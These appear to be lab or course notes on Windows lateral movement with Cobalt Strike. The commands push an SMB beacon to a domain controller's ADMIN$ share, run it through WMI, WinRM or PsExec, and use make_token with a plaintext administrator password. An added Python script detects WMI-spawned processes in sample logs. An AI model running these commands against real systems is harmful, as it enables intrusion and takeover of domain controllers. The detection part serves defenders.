Windows Management Instrumentation (WMI)

Create an access using credentials.

jump psexec DC01 smb_listener
jump winrm64 DC01 smb_listener

Execute a command on a remote machine.

remote-exec winrm DC01 [command]
cd \\DC01\ADMIN$
upload c:\Tools\Payloads\smb_beacon_x64.exe
remote-exec wmi DC01 C:\Windows\smb_beacon_x64.exe
link DC01

CoInitializeSecurity

If the error CoInitializeSecurity already called appears when running the commands:

make_token PAY\Administrator Qwerty123
remote-exec wmi DC01 calc

We can do the following using SharpWMI.

execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=DC01 command="C:\Windows\System32\calc.exe"
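As an added defender-side example that is not part of these notes: processes launched through WMI (remote-exec wmi, SharpWMI action=exec) appear on the target as children of WmiPrvSE.exe. The script below parses constructed Sysmon Event ID 1 style records (the field names and log format are assumptions) and flags such process creations.

```python
# Added example (not from the original notes): flag process-creation events whose
# parent is the WMI provider host, WmiPrvSE.exe. Log records below are constructed
# in a Sysmon Event ID 1 style; the field layout is an assumption for illustration.
import re

# Constructed sample records: one benign service start, two WMI-spawned processes
# (calc.exe and the beacon from the notes), one interactive notepad launch.
SAMPLE_EVENTS = [
    "EventID=1 Image=C:\\Windows\\System32\\svchost.exe ParentImage=C:\\Windows\\System32\\services.exe User=NT AUTHORITY\\SYSTEM",
    "EventID=1 Image=C:\\Windows\\System32\\calc.exe ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe User=PAY\\Administrator",
    "EventID=1 Image=C:\\Windows\\smb_beacon_x64.exe ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe User=PAY\\Administrator",
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\explorer.exe User=PAY\\jdoe",
]

# Key=Value pairs; values may contain spaces (e.g. "NT AUTHORITY\SYSTEM"), so a value
# runs until the next " Key=" token or end of line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")


def parse_event(line):
    """Split a 'Key=Value Key=Value ...' record into a dict."""
    return dict(FIELD_RE.findall(line))


def is_wmi_spawned(event):
    """True when a process-creation event's parent is the WMI provider host."""
    parent = event.get("ParentImage", "").lower()
    return event.get("EventID") == "1" and parent.endswith("\\wbem\\wmiprvse.exe")


def find_wmi_spawned(lines):
    """Return (image, user) for every process created under WmiPrvSE.exe."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_wmi_spawned(ev):
            hits.append((ev["Image"], ev.get("User", "")))
    return hits


if __name__ == "__main__":
    for image, user in find_wmi_spawned(SAMPLE_EVENTS):
        print(f"WMI-spawned process: {image} as {user}")
```

WmiPrvSE.exe also hosts legitimate management queries, so this is a triage signal to correlate with the source host and account rather than a verdict on its own.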